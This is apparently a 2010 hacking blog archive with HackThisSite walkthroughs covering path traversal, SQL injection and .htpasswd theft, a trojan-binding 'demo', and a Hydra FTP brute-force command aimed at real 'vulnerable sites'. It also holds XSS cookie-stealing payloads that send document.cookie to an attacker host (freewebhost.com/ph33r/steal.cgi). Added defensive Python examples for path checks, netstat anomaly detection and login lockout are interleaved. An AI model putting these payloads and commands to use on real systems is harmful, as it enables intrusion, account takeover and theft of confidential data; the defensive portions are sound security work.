Friday, October 22, 2010

Hackthissite realistic mission 3

Open the page source. At the bottom of the source you will see that the hacker simply renamed index.html to oldindex.html.

Then you just have to type in the URL http://www.hackthissite.org/missions/realistic/3/oldindex.html to view the old page. View the source and copy all of it. Then you will have to submit a poem, and this is the important part. If you simply type in the name of your poem, it will be saved in the current directory. You need to submit the source of oldindex.html as index.html, and in the correct place. For that you need to go up one directory. This is accomplished by '../', which is prefixed to the name of our file 'index.html'.

The name of the poem has to be "../index.html" for this to work. Then paste the code you copied into the textarea where you are supposed to write a poem.




Hackthissite Realistic mission 2

Analyse the source code of each page. You will see update.php there, at the very end of the page. Click on it, or just type the URL http://www.hackthissite.org/missions/realistic/2/update.php.

View the page source again. This time you will see a form with the action update2.php. You will try clicking without a password, and you get "Invalid username/password".

Then click back so you can type your username and password again. We use SQL injection. Use the username " ' or 1=1 - " and the same as the password, and you are done! SQL injection is a very outdated vulnerability and you will hardly find a web application vulnerable to it.

Hackthissite realistic mission 7

You will need to use John the Ripper to crack the password. Let's start with the mission. The first thing to do is analyse the source code and also keep an eye on the URL. The URL in your browser will show you something like " showimages.php?file= " followed by a filename. The PHP file displays the file whose name is given as the parameter. If you analysed the source carefully you must have found the admin folder. If you click on it you will get the opportunity to log in to the admin part of the page. Typing the wrong password will not help you, though.

You will notice that the server is using HTTP authentication (used by Apache servers). Folders in Apache are secured by two files, namely .htpasswd and .htconf: the password file and the configuration file. You need to get the hash in the password file, which will then be cracked by JTR. Enough clues, eh?

Type this in the address bar: " http://www.hackthissite.org/missions/realistic/7/showimages.php?file=images/admin/.htpasswd " and you will see a little square with two vertical lines. Right click on the left vertical line and then copy the link. In Firefox you can just click on Properties, but I don't know about other browsers.

You will then have to paste this into a txt file. Time to brute-force it using John the Ripper.

Save what you copied in the run directory of the John the Ripper program. Let's say we save this file as pass.txt. You then have to open the command prompt and change into the run directory. You will have to use the command " john-386 --show pass.txt ". It will look something like this:


This was on a Windows computer.
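Missions 3 and 7 are the same bug seen from two sides: a user-supplied filename is written (the poem named "../index.html") or read (showimages.php?file=images/admin/.htpasswd) without being confined to the directory it is meant for. The following added example, which is my own code and not HackThisSite's, shows the check a server-side script should apply to such a parameter before touching the filesystem. The base directories /srv/poems and /srv/site are hypothetical and do not need to exist for the check to run.

```python
import os

def resolve_under(base_dir, user_path):
    """Return the absolute path for user_path only if it stays inside base_dir.

    Raises ValueError otherwise. Both sides are passed through realpath so a
    symlink inside base_dir cannot be used to point outside it either.
    """
    base = os.path.realpath(base_dir)
    # Reject absolute input outright: os.path.join would silently drop base_dir.
    if os.path.isabs(user_path):
        raise ValueError("absolute path not allowed: %r" % user_path)
    candidate = os.path.realpath(os.path.join(base, user_path))
    if candidate == base:
        raise ValueError("path names the base directory itself: %r" % user_path)
    # commonpath is the containment check; a plain startswith() would wrongly
    # accept /srv/poems_other when the base is /srv/poems.
    if os.path.commonpath([base, candidate]) != base:
        raise ValueError("path escapes base directory: %r" % user_path)
    # Dotfiles such as .htpasswd are never legitimate content to serve or overwrite.
    parts = os.path.relpath(candidate, base).split(os.sep)
    if any(part.startswith(".") for part in parts):
        raise ValueError("dotfile not allowed: %r" % user_path)
    return candidate

def check(base_dir, user_path):
    """Convenience wrapper returning 'allowed' or 'rejected' for a request."""
    try:
        resolve_under(base_dir, user_path)
        return "allowed"
    except ValueError:
        return "rejected"

if __name__ == "__main__":
    # Constructed requests mirroring the two missions (hypothetical base dirs).
    for base, name in [("/srv/poems", "mypoem.txt"),
                       ("/srv/poems", "../index.html"),
                       ("/srv/site", "images/pic.jpg"),
                       ("/srv/site", "images/admin/.htpasswd"),
                       ("/srv/site", "/etc/passwd")]:
        print("%-12s %-26s %s" % (base, name, check(base, name)))
```

The traversal in mission 3 fails the commonpath test and the .htpasswd read in mission 7 fails the dotfile test; rejecting rather than "cleaning" the input avoids the usual trap where stripping "../" once leaves "....//" behind.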

Thursday, October 21, 2010

Trojan attack demo - Remote control your victim's PC

You must be familiar with what a trojan is. A trojan is similar to a virus but it can be more lethal in the way it gives the attacker complete control over the victim's PC. Usually trojans come in two parts: the client and the server. The server resides on the victim's PC and the client is used to connect to it and play mischief, create havoc and much more. The attacker can take snapshots of the victim's screen, install a keylogger which will send him all the keystrokes, reboot the system, crash the system, eject the CD-ROM and much more. This tutorial will show you how the hacker accomplishes his task and how to protect yourself from it.

The first thing a hacker does is install the server on the victim's PC. The hacker does this very cleverly. The server part of the trojan is bound with a small program, like a chess game for example. The victim is deluded into thinking that the game is harmless. He installs it, not knowing that a trojan is being installed along with it in the background. The next thing the hacker needs to know is the IP address of the victim, which he will use to connect the client to the server.

The following demo is for educational purposes only.

We take the example of a trojan named Aladino. It is available for free over the internet. The hacker binds the server part of this trojan with, say, a game of chess, using a program called a binder. The victim is deluded into thinking that it is a harmless program. He installs it on his hard disk. Once it is executed, it will wait for commands to be sent by the hacker. There are many commands available, for example

SCREEN_CAPTURE C:\\snapshot.bmp

This command will take a snapshot of the victim's screen and store it in C:\\snapshot.bmp. Other commands can be seen after typing help at the command prompt. They are simple and self-explanatory.
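The post promises to show how to protect yourself, and the server half of the trojan gives the defender its own tell: a program that was supposed to be a chess game is either listening on a port or holding a connection to the attacker's client. The following added example (my own code, not part of the post or of any trojan) parses lines in the layout of Windows "netstat -ano" output and flags listeners and connections that do not match a baseline for the host. The netstat lines, the PID-to-image map and the baseline sets are all constructed for the demo.

```python
import re

# Constructed lines in the layout of "netstat -ano"; not captured from a real host.
SAMPLE_NETSTAT = """\
  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       884
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:6969           0.0.0.0:0              LISTENING       3120
  TCP    192.168.1.10:49702     203.0.113.5:443        ESTABLISHED     2244
  TCP    192.168.1.10:49710     198.51.100.7:31337     ESTABLISHED     3120
"""

# Hypothetical host baseline: ports that are supposed to be listening, the
# PID-to-image map "tasklist" would give at the same moment, and the images
# that are allowed to hold outbound connections at all.
EXPECTED_LISTEN_PORTS = {135, 445}
PROCESS_NAMES = {4: "System", 884: "svchost.exe", 2244: "firefox.exe", 3120: "chess.exe"}
NETWORK_PROCESSES = {"System", "svchost.exe", "firefox.exe"}

LINE_RE = re.compile(r"^\s*(TCP)\s+(\S+):(\d+)\s+(\S+):(\d+)\s+([A-Z_]+)\s+(\d+)\s*$")

def parse_netstat(text):
    """Turn TCP lines of netstat -ano into dicts; header and UDP lines are skipped."""
    rows = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        _, laddr, lport, raddr, rport, state, pid = m.groups()
        rows.append({"laddr": laddr, "lport": int(lport), "raddr": raddr,
                     "rport": int(rport), "state": state, "pid": int(pid)})
    return rows

def find_suspicious(text, expected_ports=EXPECTED_LISTEN_PORTS,
                    names=PROCESS_NAMES, allowed=NETWORK_PROCESSES):
    """Flag listeners outside the baseline and connections held by processes
    that have no business on the network (a chess game, say)."""
    findings = []
    for r in parse_netstat(text):
        image = names.get(r["pid"], "unknown")
        if r["state"] == "LISTENING" and r["lport"] not in expected_ports:
            findings.append("unexpected listener %s (pid %d) on port %d"
                            % (image, r["pid"], r["lport"]))
        elif r["state"] == "ESTABLISHED" and image not in allowed:
            findings.append("unexpected connection from %s (pid %d) to %s:%d"
                            % (image, r["pid"], r["raddr"], r["rport"]))
    return findings

if __name__ == "__main__":
    for finding in find_suspicious(SAMPLE_NETSTAT):
        print(finding)
```

A baseline like this is only as good as the moment it was taken, so in practice the expected sets come from a snapshot of the machine when it was known clean, and the check is rerun after every new install.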

Tuesday, October 19, 2010

Stuxnet - The Marvellous Malware

Computerworld - The Stuxnet worm is a "groundbreaking" piece of malware so devious in its use of unpatched vulnerabilities, so sophisticated in its multipronged approach, that the security researchers who tore it apart believe it may be the work of state-backed professionals.

"It's amazing, really, the resources that went into this worm," said Liam O Murchu, manager of operations with Symantec's security response team.

“With the forensics we now have it is evident and provable that Stuxnet is a directed sabotage attack involving heavy insider knowledge,” wrote Ralph Langner, the CEO of Langner Communications, on the company website.

“The attack combines an awful lot of skills - just think about the multiple 0day vulnerabilities, the stolen certificates etc. This was assembled by a highly qualified team of experts, involving some with specific control system expertise.”

“Based on a conditional check, original code for OB 35 is manipulated during the transmission. If the condition matches, Stuxnet injects Step7 code into OB 35 that is executed on the PLC every time that OB 35 is called,” Langner explained in a brief report.

Yet, the really interesting aspect to Langner’s research is the conclusion that the attack was designed to have a short shelf life.

“Therefore, the whole attack only makes sense within a very limited timeframe…So we can conclude that the planned time of attack isn't somewhen next year. I must assume that the attack did already take place. I am also assuming that it was successful,” Langner commented.


Saturday, October 16, 2010

Friday, October 15, 2010

Brute force attack

In simple terms, a brute force attack is used to crack a password and/or login name of, say, an FTP site. Here you use a brute force attacker program (the one we are going to use is called Hydra) to carry out the attack. This program uses a wordlist which contains hundreds or maybe thousands of words, which the program sends as the password to the server. If one matches the correct password, you get logged in; else you gotta add more words to the list. Remember that hacking requires a lot of patience.

So first of all you need to download and install hydra-5.4. Google it. It's free and it doesn't have a graphical interface; you'll have to use the command line. After you have downloaded it, you need to search for a wordlist. Search for 'wordlist.txt' on Google. It'll be a text file. Save it on your hard disk. Add more words or phone numbers to it if you want to.

The next thing to do is search for a vulnerable site. A site that allows anonymous login through FTP can be vulnerable. Or if you know the admin login name you can brute-force the site as demonstrated below. Let's say the admin login name is 'admin'. You can use a wordlist for admin names too. Open the command prompt and change to the directory where you downloaded Hydra. Type the following

hydra -l admin -P wordlist.txt -e ns -vV [ip address] ftp

where [ip address] is the IP address of the site. To find the IP address you can ping the site by typing the following at the cmd prompt

ping sitetobehacked.com

sitetobehacked is the name of the vulnerable site. You will see the IP address of the site. The wordlist should be in the same directory, and if you want to use a wordlist for the username as well, replace admin with a text file where you have saved the names. Back to our Hydra program: after you type the above command and hit enter, Hydra will start brute-forcing the site, and it will take a few minutes depending on the length of your wordlist. As soon as a word matches the correct password, the program will stop and you will see the real password. Use it to log in to the site using FTP, and then you can download and upload files to the server and view all confidential documents!
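The attack above only takes "a few minutes" because the server answers every guess at full speed. The added example below (my own code, not from Hydra or from the post) simulates a per-account lockout policy and replays a constructed wordlist against it in the order Hydra's "-e ns" option would produce: the empty password first, then the login name, then the list. The policy numbers (5 failures in 60 seconds, 300 second lockout), the account, its password and the wordlist are all assumptions made for the demo, and the clock is faked so the run is deterministic.

```python
import hmac

class FakeClock:
    """Deterministic clock for the demo: every call advances one second."""
    def __init__(self):
        self.now = 0.0

    def __call__(self):
        self.now += 1.0
        return self.now

class LoginGuard:
    """Per-account failure counter with a lockout window (hypothetical policy).

    After max_failures wrong passwords within window seconds the account
    refuses every attempt for lockout seconds, the correct password included.
    Failures and lockouts are recorded so the guessing shows up in logs.
    """
    def __init__(self, credentials, clock, max_failures=5, window=60.0, lockout=300.0):
        self.credentials = credentials      # constructed {user: password}
        self.clock = clock
        self.max_failures = max_failures
        self.window = window
        self.lockout = lockout
        self.failures = {}                  # user -> timestamps of recent failures
        self.locked_until = {}              # user -> time at which the lockout ends
        self.log = []

    def attempt(self, user, password):
        now = self.clock()
        if self.locked_until.get(user, 0.0) > now:
            self.log.append("%4.0fs LOCKED  user=%s" % (now, user))
            return "locked"
        recent = [t for t in self.failures.get(user, []) if now - t < self.window]
        stored = self.credentials.get(user)
        # Constant-time comparison; unknown users always fail.
        if stored is not None and hmac.compare_digest(stored.encode(), password.encode()):
            self.failures[user] = []
            return "ok"
        recent.append(now)
        self.failures[user] = recent
        self.log.append("%4.0fs FAILED  user=%s" % (now, user))
        if len(recent) >= self.max_failures:
            self.locked_until[user] = now + self.lockout
            self.log.append("%4.0fs LOCKOUT user=%s failures=%d" % (now, user, len(recent)))
        return "failed"

# Constructed wordlist: "" and "admin" are what -e ns adds in front of the file.
WORDLIST = ["", "admin", "123456", "password", "letmein", "qwerty", "correct-horse", "dragon"]
CREDENTIALS = {"admin": "correct-horse"}   # constructed account for the demo

def replay(wordlist, max_failures):
    """Replay the wordlist against one account; stop at the first success."""
    guard = LoginGuard(CREDENTIALS, FakeClock(), max_failures=max_failures)
    results = []
    for word in wordlist:
        results.append(guard.attempt("admin", word))
        if results[-1] == "ok":
            break
    return results, guard.log

if __name__ == "__main__":
    for limit in (5, 10**9):
        results, log = replay(WORDLIST, limit)
        print("max_failures=%s -> %s" % (limit, results))
        for line in log:
            print("   ", line)
```

With the lockout in place the real password is refused when the wordlist reaches it, and the log carries a LOCKOUT line to alert on; without it the seventh guess succeeds, which is exactly the run the post describes.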

Thursday, October 14, 2010

I wanna be a hacker!

The tag of a 'hacker' fascinates most of the teens out there. And maybe the reason you are reading this post is that you are one of them.
To be considered an elite hacker you need to have certain skills and, more importantly, a very deep and sound understanding of computers, operating systems, networking, programming and security. Well, even I am not that good, but I know little things which I learned all by myself and I wanna share them with you guys so as to give you a push in the right direction to learning stuff related to hacking.

A hacker is not always a criminal and I am not writing this post to encourage cyber-crime.

'So what do I need to learn to become a hacker?' This is the most common question asked by newbies. Well, you can hack your way through even without knowing any programming language or the nitty-gritty of what you are doing. But then you will be called a 'script kiddie' and not a hacker. Script kiddies use ready-made programs or scripts to exploit vulnerabilities. But at least it'll give you a start. I'll write about the tools that are frequently used by script kiddies in my next post.


But if you really wanna become a hacker, you need to learn a lot. The best programming language to learn is Perl. The next thing you need to do is install, learn and use ONLY Linux. You can learn C along with it and start tinkering with the OS. This way you'll learn the internal functioning of the OS. The next thing to do is learn Visual Basic: easy and robust. And if you are a Windows lover then you had better be happy hacking your system registry only. A little knowledge of HTML, PHP and SQL is always helpful. The more you know about them, the better hacker you will become. But in my posts I assume that you don't know any of them.


The best way to start is 'Google hacking'. No, we are not gonna hack Google. Google's search mechanism proves to be an indispensable tool for a hacker to find vulnerable sites and gather valuable information. I'll cover Google hacking in detail in my next post.


Wednesday, October 13, 2010

XSS attack scenario and prevention

A cross-site scripting (XSS) attack exploits bugs in a web application to steal cookies, credit card numbers and other sensitive information. For the technically challenged, a bug is a flaw in the coding of a program or application. The web application may be a forum or any other place where the user can input data.
An attacker can also send fraudulent emails impersonating a bank or shopping site, for example, and steal the user's cookies, which the original site uses to authenticate him. A real-life scenario is given below.
First of all, the attacker finds that there is an XSS vulnerability in the web application software that the shopping website uses. He then sends the victim an email with the following HTML:

<A HREF="http://archives.cnn.com/2001/US/09/16/inv.binladen.denial/?tw=<script>document.location.replace('http://freewebhost.com/ph33r/steal.cgi?'+document.cookie);</script>">Check this Article Out! </a>

The user would of course click the link and would be led to the CNN news article, but at the same time the attacker would have been able to direct the user towards his specially crafted URL, so he now has the user's cookie. Using the Firefox cookie editor the attacker copies and pastes the victim's cookie and uses it for himself. The attacker now refreshes the page and has access to the victim's account, and the victim is billed for everything the attacker chooses to buy.

To find vulnerable sites, like all script kiddies, you can make extensive use of Google, which we call Google hacking.

EXPLOITS AND VULNERABILITIES 

PHP NUKE VULNERABILITIES AND EXPLOITS:

http://localhost/nuke73/modules.php?name=News&file=article&sid=1&optionbox=['http://freewebhost.comht/ph33r/steal.cgi?'+document.cookie]

The above exploit works because modules.php fails to sanitize user input. Had the vendor bothered to make sure that input did not contain malicious code, the attack would not be possible.

PHPBB FORUM VULNERABILITIES AND EXPLOITS:

http://localhost.com/phpBB2/login.php('http://freewebhost.com/ph33r/steal.cgi?' document.cookie)


The above exploit is for an HTTP splitting vulnerability in phpBB. HTTP splitting is when someone injects their own information into the HTTP headers. Again, if the PHP software filtered the user input correctly it would not be allowed to happen; user input should NEVER be trusted.

INVISION POWER BOARD:

http://[target]/index.php?act='><script>alert(document.cookie)</script>

The above is obviously just a proof-of-concept exploit; all it does is display a message box. It targets a vulnerability in IPB that is allowed to occur because IPB (version < 2.03) failed to sanitize user input.

After looking at the above vulnerabilities you should be able to conclude that XSS attacks occur mainly because a vendor fails to sanitize user input in their program(s).